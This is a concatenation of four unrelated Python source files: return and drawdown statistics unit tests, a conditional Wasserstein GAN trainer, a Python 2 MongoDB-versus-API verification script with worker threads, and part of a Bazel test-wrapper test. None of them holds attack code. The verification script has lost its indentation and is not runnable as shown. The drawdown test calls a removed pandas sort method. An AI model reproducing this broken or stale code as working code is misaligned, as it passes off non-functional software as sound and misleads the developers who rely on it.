    def test_drawdown_overlaps(self):
        # Add test to show that drawdowns don't overlap
        # Bug #145 observed for FB stock on the period 2014-10-24 - 2015-03-19
        # Reproduced on SPY data (cached) but need a large number of drawdowns
        spy_rets = utils.get_symbol_rets('SPY',
                                         start='1997-01-01',
                                         end='2004-12-31')
        # NOTE(review): DataFrame.sort was removed in pandas 0.20+;
        # sort_values('peak date') is required on modern pandas.
        spy_drawdowns = timeseries.gen_drawdown_table(spy_rets, top=20).sort(
            'peak date')
        # Compare the recovery date of each drawdown with the peak of the next
        # Last pair might contain a NaT if drawdown didn't finish, so ignore it
        pairs = list(zip(spy_drawdowns['recovery date'],
                         spy_drawdowns['peak date'].shift(-1)))[:-1]
        for recovery, peak in pairs:
            self.assertLessEqual(recovery, peak)

    # 1.20 -> 0.70 peak-to-trough on px_list_1 gives a -44% max drawdown.
    @parameterized.expand([
        (pd.Series(px_list_1 - 1, index=dt), -0.44000000000000011)
    ])
    def test_max_drawdown(self, returns, expected):
        self.assertEqual(timeseries.max_drawdown(returns), expected)

    @parameterized.expand([
        (pd.Series(px_list_1 - 1, index=dt), -0.44000000000000011)
    ])
    def test_max_drawdown_underwater(self, underwater, expected):
        self.assertEqual(timeseries.max_drawdown(underwater), expected)

    # NOTE(review): the expected peak/valley/recovery are all the first date
    # of the series -- confirm this matches get_top_drawdowns' contract.
    @parameterized.expand([
        (pd.Series(px_list_1,
                   index=dt),
         1,
         [(pd.Timestamp('2000-01-03 00:00:00'),
           pd.Timestamp('2000-01-03 00:00:00'),
           pd.Timestamp('2000-01-03 00:00:00'))])
    ])
    def test_top_drawdowns(self, returns, top, expected):
        self.assertEqual(
            timeseries.get_top_drawdowns(
                returns,
                top=top),
            expected)
class TestCumReturns(TestCase):
    """Tests for timeseries.cum_returns (compounded wealth path)."""

    dt = pd.date_range('2000-1-3', periods=3, freq='D')

    # Cases: (returns, expected cumulative series, starting value).  The
    # NaN in the second case is expected to compound as a zero return.
    @parameterized.expand([
        (pd.Series([.1, -.05, .1], index=dt),
         pd.Series([1.1, 1.1 * .95, 1.1 * .95 * 1.1], index=dt), 1.),
        (pd.Series([np.nan, -.05, .1], index=dt),
         pd.Series([1., 1. * .95, 1. * .95 * 1.1], index=dt), 1.),
    ])
    def test_expected_result(self, input, expected, starting_value):
        output = timeseries.cum_returns(input, starting_value=starting_value)
        pdt.assert_series_equal(output, expected)
class TestVariance(TestCase):
    """Test for timeseries.var_cov_var_normal (parametric value-at-risk)."""

    # Case: (portfolio value P, confidence c, mu, sigma, expected VaR).
    @parameterized.expand([
        (1e7, 0.5, 1, 1, -10000000.0)
    ])
    def test_var_cov_var_normal(self, P, c, mu, sigma, expected):
        self.assertEqual(
            timeseries.var_cov_var_normal(
                P,
                c,
                mu,
                sigma),
            expected)
class TestNormalize(TestCase):
    """Tests for timeseries.normalize."""

    dt = pd.date_range('2000-1-3', periods=8, freq='D')
    px_list = [1.0, 1.2, 1.0, 0.8, 0.7, 0.8, 0.8, 0.8]

    @parameterized.expand([
        (pd.Series(np.array(px_list) * 100, index=dt),
         pd.Series(px_list, index=dt))
    ])
    def test_normalize(self, returns, expected):
        """Normalizing a scaled series recovers the original values."""
        normalized = timeseries.normalize(returns)
        self.assertTrue(normalized.equals(expected))
class TestAggregateReturns(TestCase):
    """Tests for timeseries.aggregate_returns."""

    # Three 10% daily returns followed by zeros.
    simple_rets = pd.Series(
        [0.1] * 3 + [0] * 497,
        pd.date_range('2000-1-3', periods=500, freq='D'))

    @parameterized.expand([
        (simple_rets, 'yearly', [0.3310000000000004, 0.0]),
        (simple_rets[:100], 'monthly', [0.3310000000000004, 0.0, 0.0, 0.0]),
        (simple_rets[:20], 'weekly', [0.3310000000000004, 0.0, 0.0])
    ])
    def test_aggregate_rets(self, returns, convert_to, expected):
        """Aggregation to each target frequency matches the references."""
        aggregated = timeseries.aggregate_returns(returns, convert_to)
        self.assertEqual(aggregated.values.tolist(), expected)
class TestStats(TestCase):
    """Reference-value tests for the summary statistics in `timeseries`.

    Fixtures are deterministic return series (three 10% returns followed
    by zeros) at daily, weekly and monthly frequencies, plus a small
    benchmark series and a short price-change list ending in a drawdown.
    """
    simple_rets = pd.Series(
        [0.1] * 3 + [0] * 497,
        pd.date_range(
            '2000-1-3',
            periods=500,
            freq='D'))
    simple_week_rets = pd.Series(
        [0.1] * 3 + [0] * 497,
        pd.date_range(
            '2000-1-31',
            periods=500,
            freq='W'))
    simple_month_rets = pd.Series(
        [0.1] * 3 + [0] * 497,
        pd.date_range(
            '2000-1-31',
            periods=500,
            freq='M'))
    simple_benchmark = pd.Series(
        [0.03] * 4 + [0] * 496,
        pd.date_range(
            '2000-1-1',
            periods=500,
            freq='D'))
    px_list = np.array(
        [10, -10, 10]) / 100. # Ends in drawdown
    dt = pd.date_range('2000-1-3', periods=3, freq='D')
    @parameterized.expand([
        (simple_rets, 'calendar', utils.DAILY, 0.10584000000000014),
        (simple_rets, 'compound', utils.DAILY, 0.16317653888658334),
        (simple_rets, 'calendar', utils.DAILY, 0.10584000000000014),
        (simple_rets, 'compound', utils.DAILY, 0.16317653888658334),
        (simple_week_rets, 'compound', utils.WEEKLY, 0.031682168889005213),
        (simple_week_rets, 'calendar', utils.WEEKLY, 0.021840000000000033),
        (simple_month_rets, 'compound', utils.MONTHLY, 0.0072238075842128158),
        (simple_month_rets, 'calendar', utils.MONTHLY, 0.0050400000000000071)
    ])
    def test_annual_ret(self, returns, style, period, expected):
        """Annualized return matches the reference for each style/period."""
        self.assertEqual(
            timeseries.annual_return(
                returns,
                style=style, period=period),
            expected)
    @parameterized.expand([
        (simple_rets, utils.DAILY, 0.12271674212427248),
        (simple_rets, utils.DAILY, 0.12271674212427248),
        (simple_week_rets, utils.WEEKLY, 0.055744909991675112),
        (simple_week_rets, utils.WEEKLY, 0.055744909991675112),
        (simple_month_rets, utils.MONTHLY, 0.026778988562993072),
        (simple_month_rets, utils.MONTHLY, 0.026778988562993072)
    ])
    def test_annual_volatility(self, returns, period, expected):
        """Annualized volatility matches the reference for each period."""
        self.assertAlmostEqual(
            timeseries.annual_volatility(
                returns,
                period=period
            ),
            expected,
            DECIMAL_PLACES
        )
    @parameterized.expand([
        (simple_rets, 'calendar', 0.8624740045072119),
        (simple_rets, 'compound', 1.3297007080039505)
    ])
    def test_sharpe(self, returns, returns_style, expected):
        """Sharpe ratio matches the reference for each returns style."""
        self.assertAlmostEqual(
            timeseries.sharpe_ratio(
                returns,
                returns_style=returns_style),
            expected, DECIMAL_PLACES)
    @parameterized.expand([
        (simple_rets[:5], 2, '[nan, inf, inf, 11.224972160321828, inf]')
    ])
    def test_sharpe_2(self, returns, rolling_sharpe_window, expected):
        """Rolling Sharpe matches the reference.

        Compared as a string so nan/inf entries can be checked alongside
        finite values.
        """
        self.assertEqual(str(timeseries.rolling_sharpe(
            returns, rolling_sharpe_window).values.tolist()), expected)
    @parameterized.expand([
        (simple_rets, 0.010766923838471554)
    ])
    def test_stability_of_timeseries(self, returns, expected):
        """Stability statistic matches the reference value."""
        self.assertAlmostEqual(
            timeseries.stability_of_timeseries(returns),
            expected, DECIMAL_PLACES)
    @parameterized.expand([
        (simple_rets[:5], simple_benchmark[:5], 2, 8.024708101613483e-32)
    ])
    def test_beta(self, returns, benchmark_rets, rolling_window, expected):
        """Third rolling-beta value against the benchmark matches reference."""
        self.assertEqual(
            timeseries.rolling_beta(
                returns,
                benchmark_rets,
                rolling_window=rolling_window).values.tolist()[2],
            expected)
    @parameterized.expand([
        (pd.Series(px_list,
                   index=dt), 'calendar', -8.3999999999999559),
        (pd.Series(px_list,
                   index=dt), 'arithmetic', 84.000000000000014)
    ])
    def test_calmar(self, returns, returns_style, expected):
        """Calmar ratio matches the reference for each returns style."""
        self.assertEqual(
            timeseries.calmar_ratio(
                returns,
                returns_style=returns_style),
            expected)
    @parameterized.expand([
        (pd.Series(px_list,
                   index=dt), 0.0, 2.0)
    ])
    def test_omega(self, returns, annual_return_threshhold, expected):
        """Omega ratio at a 0.0 threshold matches the reference value."""
        self.assertEqual(
            timeseries.omega_ratio(
                returns,
                annual_return_threshhold=annual_return_threshhold),
            expected)
    @parameterized.expand([
        (-simple_rets[:5], -12.29634091915152),
        (-simple_rets, -1.2296340919151518),
        (simple_rets, np.inf)
    ])
    def test_sortino(self, returns, expected):
        """Sortino ratio matches the reference; the all-nonnegative fixture
        is expected to yield +inf."""
        self.assertAlmostEqual(
            timeseries.sortino_ratio(returns),
            expected, DECIMAL_PLACES)
class TestMultifactor(TestCase):
    """Tests for timeseries.calc_multifactor."""

    simple_rets = pd.Series(
        [0.1] * 3 + [0] * 497,
        pd.date_range('2000-1-1', periods=500, freq='D'))
    # Single-column benchmark factor aligned with simple_rets.
    simple_benchmark_rets = pd.DataFrame(
        pd.Series(
            [0.03] * 4 + [0] * 496,
            pd.date_range('2000-1-1', periods=500, freq='D')),
        columns=['bm'])

    @parameterized.expand([
        (simple_rets[:4], simple_benchmark_rets[:4], [2.5000000000000004])
    ])
    def test_calc_multifactor(self, returns, factors, expected):
        """Multifactor regression coefficients match the reference values."""
        coeffs = timeseries.calc_multifactor(returns, factors)
        self.assertEqual(coeffs.values.tolist(), expected)
|
|
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Implements the training process for a Wassersten GAN
with Gradient Penalty [https://arxiv.org/abs/1704.00028].
"""
import tensorflow as tf
from audio_synthesis.models import wgan
SHUFFLE_BUFFER_SIZE = 300
def _compute_losses(discriminator, d_real, d_fake, interpolated_x, interpolated_c):
    """Base implementation of the WGAN generator and discriminator losses.

    Two gradient penalties are applied: one taken with respect to the
    interpolated data points (conditioning held fixed) and one with
    respect to the interpolated conditioning (data held fixed).

    Args:
        discriminator: The discriminator function.
        d_real: The discriminator score for the real data points.
        d_fake: The discriminator score for the fake data points.
        interpolated_x: The interpolation between the real and fake
            data points.
        interpolated_c: The interpolation between the real and fake
            conditioning.

    Returns:
        A (g_loss, d_loss) tuple holding the generator loss and the
        discriminator loss.
    """
    penalty_x = wgan.compute_gradient_penalty(
        lambda mixed_x: discriminator(mixed_x, interpolated_c),
        interpolated_x
    )
    penalty_c = wgan.compute_gradient_penalty(
        lambda mixed_c: discriminator(interpolated_x, mixed_c),
        interpolated_c
    )

    wasserstein_distance = tf.reduce_mean(d_real) - tf.reduce_mean(d_fake)
    g_loss = tf.reduce_mean(d_fake)
    d_loss = wasserstein_distance + (
        wgan.GRADIENT_PENALTY_LAMBDA * penalty_x +
        wgan.GRADIENT_PENALTY_LAMBDA * penalty_c
    )
    return g_loss, d_loss
class ConditionalWGAN(wgan.WGAN): # pylint: disable=too-many-instance-attributes
    """Implements the training procedure for Wasserstein GAN [1] with Gradient Penalty [2] in
    a conditional setting.
    This class extends the training procedure for an arbitrary Wasserstein GAN [1] using
    the Gradient Penalty [2] technique for enforcing the required Lipschitz constraint. The
    current implementation uses a uniform prior distribution, U(-1, 1).
    [1] Wasserstein GAN - https://arxiv.org/abs/1701.07875.
    [2] Improved Training of Wasserstein GANs - https://arxiv.org/abs/1704.00028.
    """
    def __init__(self, raw_dataset, raw_conditioning_dataset, generator,
                 discriminator, z_dim, generator_optimizer, discriminator_optimizer,
                 discriminator_training_ratio=5, batch_size=64, epochs=1, checkpoint_dir=None,
                 epochs_per_save=10, fn_compute_loss=_compute_losses,
                 fn_get_discriminator_input_representations=wgan.get_representations,
                 fn_save_examples=None):
        """Initializes the ConditionalWGAN class.
        Parameters:
            raw_dataset: A numpy array containing the training dataset.
            raw_conditioning_dataset: A numpy array containing the conditioning information.
                Should be aligned with raw_dataset, and contain the same number of
                elements.
            generator: The generator model.
            discriminator: A list of discriminator models. If only one
                discriminator then a singleton list should be given.
            z_dim: The number of latent features.
            generator_optimizer: The optimizer for the generator model.
            discriminator_optimizer: The optimizer for the discriminator.
            discriminator_training_ratio: The number of discriminator updates
                per generator update. Default is 5.
            batch_size: Number of elements in each batch.
            epochs: Number of epochs of the training set.
            checkpoint_dir: Directory in which the model weights are saved. If
                None, then the model is not saved.
            epochs_per_save: How often the model weights are saved.
            fn_compute_loss: The function that computes the generator and
                discriminator loss. Must have signature
                f(model, d_real, d_fake, interpolated_x, interpolated_c).
            fn_get_discriminator_input_representations: A function that takes
                a data point (real and fake) and produces a list of representations,
                one for each discriminator. Default is an identity function.
                Signature expected is f(x_in), result should be an N element list
                of representations.
            fn_save_examples: A function to save generations and real data,
                called after every epoch.
        """
        # NOTE(review): the conditioning dataset is passed to the parent as
        # its *primary* dataset, so the inherited self.dataset iterates over
        # conditioning samples only (used as c_gen_in in _train_step) --
        # confirm against wgan.WGAN.__init__.
        super(ConditionalWGAN, self).__init__(
            raw_conditioning_dataset, generator, discriminator, z_dim,
            generator_optimizer, discriminator_optimizer, discriminator_training_ratio,
            batch_size, epochs, checkpoint_dir, epochs_per_save, fn_compute_loss,
            fn_get_discriminator_input_representations, fn_save_examples
        )
        self.raw_x_dataset = raw_dataset
        # Jointly sampled (x, c) pairs, shuffled and repeated once per
        # discriminator update so a full generator step consumes
        # discriminator_training_ratio batches.
        # NOTE(review): self.buffer_size is presumably set by wgan.WGAN's
        # constructor (module-level SHUFFLE_BUFFER_SIZE is unused here) --
        # confirm.
        self.conditioned_dataset = tf.data.Dataset.from_tensor_slices(
            (raw_dataset, raw_conditioning_dataset)).shuffle(
            self.buffer_size).repeat(self.discriminator_training_ratio).batch(
            self.batch_size, drop_remainder=False)
    def _train_step(self, data_in, train_generator=True, train_discriminator=True):
        """Executes one training step of the WGAN model.
        Parameters:
            data_in: One batch of training data. Has the form ((x_in, c_in), c_gen_in).
                Where (x_in, c_in) is jointly sampled and c_gen_in is sampled from the
                conditional marginal.
            train_generator: If true, the generator weights will be updated.
            train_discriminator: If true, the discriminator weights will be updated.
        """
        xc_in, c_gen_in = data_in
        x_in, c_in = xc_in
        x_in_representations = self.fn_get_discriminator_input_representations(x_in)
        with tf.GradientTape() as gen_tape:
            g_loss = 0
            # Latent prior is U(-1, 1), matching the class docstring.
            z_in = tf.random.uniform((x_in.shape[0], self.z_dim), -1, 1)
            x_gen = self.generator(z_in, c_gen_in, training=True)
            x_gen_representations = self.fn_get_discriminator_input_representations(x_gen)
            # One inner tape per discriminator so each d_loss_i gradient is
            # isolated; weighted generator losses accumulate under gen_tape.
            for i in range(len(self.discriminator)):
                with tf.GradientTape() as disc_tape:
                    d_real = self.discriminator[i](
                        x_in_representations[i], c_in, training=True
                    )
                    d_fake = self.discriminator[i](
                        x_gen_representations[i], c_gen_in, training=True
                    )
                    x_interpolation = wgan.get_interpolation(
                        x_in_representations[i], x_gen_representations[i]
                    )
                    c_interpolation = wgan.get_interpolation(c_in, c_gen_in)
                    g_loss_i, d_loss_i = self.fn_compute_loss(
                        self.discriminator[i], d_real, d_fake, x_interpolation, c_interpolation
                    )
                    # NOTE(review): assumes each discriminator model carries a
                    # 'weighting' attribute -- confirm where it is assigned.
                    g_loss += self.discriminator[i].weighting * g_loss_i
                if train_discriminator:
                    gradients_of_discriminator = disc_tape.gradient(
                        d_loss_i, self.discriminator[i].trainable_variables
                    )
                    self.discriminator_optimizer.apply_gradients(
                        zip(gradients_of_discriminator, self.discriminator[i].trainable_variables)
                    )
        if train_generator:
            gradients_of_generator = gen_tape.gradient(
                g_loss, self.generator.trainable_variables
            )
            self.generator_optimizer.apply_gradients(
                zip(gradients_of_generator, self.generator.trainable_variables)
            )
    def _get_training_dataset(self):
        """Function gives the dataset to use during training.
        In this case, returns the joint data/conditioning dataset
        zipped with the (conditioning-only) parent dataset, which supplies
        the independently sampled c_gen_in.
        Returns:
            A tf.Data dataset object for model training.
        """
        return tf.data.Dataset.zip((self.conditioned_dataset, self.dataset))
    def _generate_and_save_examples(self, epoch):
        """Generates a batch of fake samples and saves them, along with
        a batch of real data for comparison. Calls the given fn_save_examples.
        Args:
            epoch: The current epoch, added as a post-fix of the file
                name.
        """
        if self.fn_save_examples:
            z_in = tf.random.uniform((self.batch_size, self.z_dim), -1, 1)
            x_save = self.raw_x_dataset[0:self.batch_size]
            # NOTE(review): self.raw_dataset is presumably the parent's copy
            # of raw_conditioning_dataset (passed first to super().__init__),
            # i.e. this slices conditioning values -- verify in wgan.WGAN.
            c_save = self.raw_dataset[0:self.batch_size]
            generations = tf.squeeze(self.generator(z_in, c_save, training=False))
            self.fn_save_examples(epoch, x_save, generations)
|
|
import csv
import traceback
import logging
from pymongo import MongoClient
import datetime
from Queue import Queue
from utilsDataFile import Utils
import json
from threading import Thread
from colorama import init
init(autoreset=True)  # colorama: reset terminal colors after every print
__author__ = 'asifj'
# Root logger configuration shared by all worker threads.
# NOTE(review): '%(msecs)s' prints the raw float; '%(msecs)03d' is the usual
# zero-padded form -- confirm intent.
logging.basicConfig(
    format='%(asctime)s.%(msecs)s:%(name)s:%(thread)d:%(levelname)s:%(process)d:%(message)s',
    level=logging.INFO
)
# Feature toggles: set exactly one of SR / KBLINKS / ATTACHMENTS to 1 to
# select which verification pass the script runs.
SR = 0
KBLINKS = 0
ATTACHMENTS = 1
# Slice bounds [DOCUMENT_NO:DOCUMENT_NO_END] applied to the Mongo cursor;
# DOCUMENT_NO is also reused below as a running document counter.
DOCUMENT_NO = 0
DOCUMENT_NO_END = 0
def worker_func_sr(utils, queue, output_writer, response_writer):
while True:
data = queue.get()
document = data[0]
document_no = data[1]
startTime = data[2]
output = ""
try:
output += utils.header(document, document_no, "SRID")
response = utils.request(document, "SRID")
output += "\n*******************************************"
output += "\nVerifying srDetails..."
output += "\n*******************************************"
output += utils.validate_sr_details(response, document, document_no, startTime, response_writer)
client = MongoClient('10.219.48.134', 27017)
db = client['ImportedEvents']
collection_new = db['srKbLink-new']
key = {'caseId': document['SRID']}
document_kbLinks = collection_new.find_one({'caseId': document['SRID']})
res = json.loads(response.text)
output += "\n\n\n*******************************************"
output += "\nVerifying kbLinks..."
output += "\n*******************************************"
if document_kbLinks is None:
output += "\n No kblinks found in document"
if not res['kbLinks']:
output += "\n No kbLinks found in response"
else:
output += "\n kbLinks found in response"
else:
if not res['kbLinks']:
output += "\n No kbLinks found in response"
else:
output += utils.validate_kb_links(response, document_kbLinks, document_no, startTime, response_writer)
output += utils.footer(output)
output_writer.write(output)
output = ""
except Exception:
print Exception.message
print "CaseId: "+str(document['SRID'])
print(traceback.format_exc())
print "\nProcessing completed document no: "+str(document_no)
queue.task_done()
def worker_func_kblinks(utils, queue, output_writer, response_writer):
while True:
data = queue.get()
document = data[0]
document_no = data[1]
startTime = data[2]
output = ""
try:
output += utils.header(document, document_no, "caseId")
response = utils.request(document, "caseId")
res = json.loads(response.text)
output += "\n\n\n*******************************************"
output += "\nVerifying kbLinks..."
output += "\n*******************************************"
if document is None:
output += "\n No kblinks found in document"
if not res['kbLinks']:
output += "\n No kbLinks found in response"
else:
output += "\n kbLinks found in response"
else:
if not res['kbLinks']:
output += "\n No kbLinks found in response"
else:
output += utils.validate_kb_links(response, document, document_no, startTime, response_writer)
output += utils.footer(output)
output_writer.write(output)
output = ""
except Exception:
print Exception.message
print "CaseId: "+str(document['caseId'])
print(traceback.format_exc())
print "\nProcessing completed document no: "+str(document_no)
queue.task_done()
def worker_func_attachments(utils, queue, output_writer, response_writer):
while True:
data = queue.get()
document = data[0]
document_no = data[1]
startTime = data[2]
output = ""
try:
output += utils.header(document, document_no, "caseId")
response = utils.request(document, "caseId")
res = json.loads(response.text)
output += "\n\n\n*******************************************"
output += "\nVerifying attachments..."
output += "\n*******************************************"
if document is None:
output += "\n No attachments found in document"
if not res['kbLinks']:
output += "\n No attachments found in response"
else:
output += "\n attachments found in response"
else:
if not res['attachments']:
output += "\n No attachments found in response"
else:
output += utils.validate_sr_attachments(response, document, document_no, startTime, response_writer)
output += utils.footer(output)
output_writer.write(output)
output = ""
except Exception:
print Exception.message
print "CaseId: "+str(document['caseId'])
print(traceback.format_exc())
print "\nProcessing completed document no: "+str(document_no)
queue.task_done()
if SR == 1:
client = MongoClient('10.219.48.134', 27017)
#client = MongoClient('192.168.56.101', 27017)
db = client['ImportedEvents']
collection = db['srDetails']
documents = collection.find(no_cursor_timeout=True)[DOCUMENT_NO:DOCUMENT_NO_END]
#documents = collection.find({'caseId':'2011-0525-T-0334'})
ofile = open('DateFileVerificationDetails-'+str(DOCUMENT_NO)+'-'+str(DOCUMENT_NO_END)+'.csv', "wb")
response_writer = csv.writer(ofile, delimiter=',', quotechar='"', quoting=csv.QUOTE_ALL)
row = ["SNo", "RequestTime", "CaseID", "KafkaJSON", "APIResponseStatus", "Elapsed", "DataStatus", "TimeTakenToCompleteRequestNProcess"]
response_writer.writerow(row)
threads = []
output_writer = open('DateFileVerificationMatch-Output-'+str(DOCUMENT_NO)+'-'+str(DOCUMENT_NO_END)+'.txt', "wb")
enclosure_queue = Queue()
utils = Utils()
# Set up some threads to fetch the enclosures
for i in range(100):
worker = Thread(target=worker_func_sr, args=(utils, enclosure_queue, output_writer, response_writer))
worker.setDaemon(True)
worker.setName("Thread-"+str(i))
worker.start()
# Download the feed(s) and put the enclosure URLs into the queue.
for document in documents:
DOCUMENT_NO += 1
try:
data = [document, DOCUMENT_NO, datetime.datetime.now()]
enclosure_queue.put(data)
except Exception:
print Exception.message
print "CaseId: "+str(document['SRID'])
print(traceback.format_exc())
print "\nDocuments in queue: "+str(enclosure_queue.qsize())
# Now wait for the queue to be empty, indicating that we have processed all of the downloads.
print '*** Main thread waiting'
enclosure_queue.join()
print '*** Done'
if KBLINKS == 1:
client = MongoClient('10.219.48.134', 27017)
#client = MongoClient('192.168.56.101', 27017)
db = client['ImportedEvents']
collection = db['srKbLink-new']
documents = collection.find(no_cursor_timeout=True)[DOCUMENT_NO:DOCUMENT_NO_END]
#documents = collection.find({'caseId':'2011-0525-T-0334'})
ofile = open('reports/srkblinks/DateFileVerificationDetails-'+str(DOCUMENT_NO)+'-'+str(DOCUMENT_NO_END)+'.csv', "wb")
response_writer = csv.writer(ofile, delimiter=',', quotechar='"', quoting=csv.QUOTE_ALL)
row = ["SNo", "RequestTime", "CaseID", "KafkaJSON", "APIResponseStatus", "Elapsed", "DataStatus", "TimeTakenToCompleteRequestNProcess"]
response_writer.writerow(row)
threads = []
output_writer = open('reports/srkblinks/DateFileVerificationMatch-Output-'+str(DOCUMENT_NO)+'-'+str(DOCUMENT_NO_END)+'.txt', "wb")
enclosure_queue = Queue()
utils = Utils()
# Set up some threads to fetch the enclosures
for i in range(10):
worker = Thread(target=worker_func_kblinks, args=(utils, enclosure_queue, output_writer, response_writer))
worker.setDaemon(True)
worker.setName("Thread-"+str(i))
worker.start()
# Download the feed(s) and put the enclosure URLs into the queue.
for document in documents:
DOCUMENT_NO += 1
try:
data = [document, DOCUMENT_NO, datetime.datetime.now()]
enclosure_queue.put(data)
except Exception:
print Exception.message
print "CaseId: "+str(document['caseId'])
print(traceback.format_exc())
print "\nDocuments in queue: "+str(enclosure_queue.qsize())
# Now wait for the queue to be empty, indicating that we have processed all of the downloads.
print '*** Main thread waiting'
enclosure_queue.join()
print '*** Done'
if ATTACHMENTS == 1:
client = MongoClient('10.219.48.134', 27017)
#client = MongoClient('192.168.56.101', 27017)
db = client['ImportedEvents']
collection = db['srAttachements-new']
documents = collection.find(no_cursor_timeout=True)[DOCUMENT_NO:DOCUMENT_NO_END]
#documents = collection.find({'caseId':'2011-0525-T-0334'})
ofile = open('reports/srAttachements/DateFileVerificationDetails-'+str(DOCUMENT_NO)+'-'+str(DOCUMENT_NO_END)+'.csv', "wb")
response_writer = csv.writer(ofile, delimiter=',', quotechar='"', quoting=csv.QUOTE_ALL)
row = ["SNo", "RequestTime", "CaseID", "KafkaJSON", "APIResponseStatus", "Elapsed", "DataStatus", "TimeTakenToCompleteRequestNProcess"]
response_writer.writerow(row)
threads = []
output_writer = open('reports/srAttachements/DateFileVerificationMatch-Output-'+str(DOCUMENT_NO)+'-'+str(DOCUMENT_NO_END)+'.txt', "wb")
enclosure_queue = Queue()
utils = Utils()
# Set up some threads to fetch the enclosures
for i in range(10):
worker = Thread(target=worker_func_attachments, args=(utils, enclosure_queue, output_writer, response_writer))
worker.setDaemon(True)
worker.setName("Thread-"+str(i))
worker.start()
# Download the feed(s) and put the enclosure URLs into the queue.
for document in documents:
DOCUMENT_NO += 1
try:
data = [document, DOCUMENT_NO, datetime.datetime.now()]
enclosure_queue.put(data)
except Exception:
print Exception.message
print "CaseId: "+str(document['caseId'])
print(traceback.format_exc())
print "\nDocuments in queue: "+str(enclosure_queue.qsize())
# Now wait for the queue to be empty, indicating that we have processed all of the downloads.
print '*** Main thread waiting'
enclosure_queue.join()
print '*** Done'
|
|
# Copyright 2018 The Bazel Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import unittest
import zipfile
from src.test.py.bazel import test_base
class TestWrapperTest(test_base.TestBase):
@staticmethod
def _ReadFile(path):
# Read the runfiles manifest.
contents = []
with open(path, 'rt') as f:
contents = [line.strip() for line in f.readlines()]
return contents
def _FailWithOutput(self, output):
self.fail('FAIL:\n | %s\n---' % '\n | '.join(output))
  def _CreateMockWorkspace(self):
    """Scratches a workspace containing every target the test cases run."""
    self.CreateWorkspaceWithDefaultRepos('WORKSPACE')
    self.ScratchFile('foo/BUILD', [
        'load(":native_test.bzl", "bat_test", "exe_test")',
        'bat_test(',
        '    name = "passing_test",',
        '    content = ["@exit /B 0"],',
        ')',
        'bat_test(',
        '    name = "failing_test",',
        '    content = ["@exit /B 1"],',
        ')',
        'bat_test(',
        '    name = "printing_test",',
        '    content = [',
        '        "@echo lorem ipsum",',
        '        "@echo HOME=%HOME%",',
        '        "@echo TEST_SRCDIR=%TEST_SRCDIR%",',
        '        "@echo TEST_TMPDIR=%TEST_TMPDIR%",',
        '        "@echo USER=%USER%",',
        '    ]',
        ')',
        'bat_test(',
        '    name = "runfiles_test",',
        '    content = [',
        '        "@echo off",',
        '        "echo MF=%RUNFILES_MANIFEST_FILE%",',
        '        "echo ONLY=%RUNFILES_MANIFEST_ONLY%",',
        '        "echo DIR=%RUNFILES_DIR%",',
        '        "echo data_path=%1",',
        '        "if exist %1 (echo data_exists=1) else (echo data_exists=0)",',
        '    ],',
        '    data = ["dummy.dat"],',
        '    args = ["$(location dummy.dat)"],',
        ')',
        'bat_test(',
        '    name = "sharded_test",',
        '    content = [',
        '        "@echo STATUS=%TEST_SHARD_STATUS_FILE%",',
        '        "@echo INDEX=%TEST_SHARD_INDEX% TOTAL=%TEST_TOTAL_SHARDS%",',
        '    ],',
        '    shard_count = 2,',
        ')',
        'bat_test(',
        '    name = "unexported_test",',
        '    content = [',
        '        "@echo GOOD=%HOME%",',
        '        "@echo BAD=%TEST_UNDECLARED_OUTPUTS_MANIFEST%",',
        '    ],',
        ')',
        'exe_test(',
        '    name = "testargs_test",',
        '    src = "testargs.exe",',
        r'    args = ["foo", "a b", "", "\"c d\"", "\"\"", "bar"],',
        ')',
        'py_test(',
        '    name = "undecl_test",',
        '    srcs = ["undecl_test.py"],',
        '    data = ["dummy.ico", "dummy.dat"],',
        '    deps = ["@bazel_tools//tools/python/runfiles"],',
        ')',
        'py_test(',
        '    name = "annot_test",',
        '    srcs = ["annot_test.py"],',
        ')',
        'py_test(',
        '    name = "xml_test",',
        '    srcs = ["xml_test.py"],',
        ')',
        'py_test(',
        '    name = "xml2_test",',
        '    srcs = ["xml2_test.py"],',
        ')',
    ])
    self.CopyFile(
        src_path=self.Rlocation('io_bazel/src/test/py/bazel/printargs.exe'),
        dst_path='foo/testargs.exe',
        executable=True)
    # A single white pixel as an ".ico" file. /usr/bin/file should identify
    # this as "image/x-icon".
    # The MIME type lookup logic of the test wrapper only looks at file names,
    # but the test-setup.sh calls /usr/bin/file which inspects file contents,
    # so we need a valid ".ico" file.
    ico_file = bytearray([
        0x00, 0x00, 0x01, 0x00, 0x01, 0x00, 0x01, 0x01, 0x00, 0x00, 0x01, 0x00,
        0x18, 0x00, 0x30, 0x00, 0x00, 0x00, 0x16, 0x00, 0x00, 0x00, 0x28, 0x00,
        0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x01, 0x00,
        0x18, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
        0x00, 0x00, 0xff, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00
    ])
    # 16 bytes of random data. /usr/bin/file should identify this as
    # "application/octet-stream".
    # The MIME type lookup logic of the test wrapper only looks at file names,
    # but the test-setup.sh calls /usr/bin/file which inspects file contents,
    # so we need genuinely arbitrary bytes for the ".dat" file.
    dat_file = bytearray([
        0x40, 0x5a, 0x2e, 0x7e, 0x53, 0x86, 0x98, 0x0e, 0x12, 0xc4, 0x92, 0x38,
        0x27, 0xcd, 0x09, 0xf9
    ])
    # ScratchFile creates the (empty) files; the raw bytes are written below.
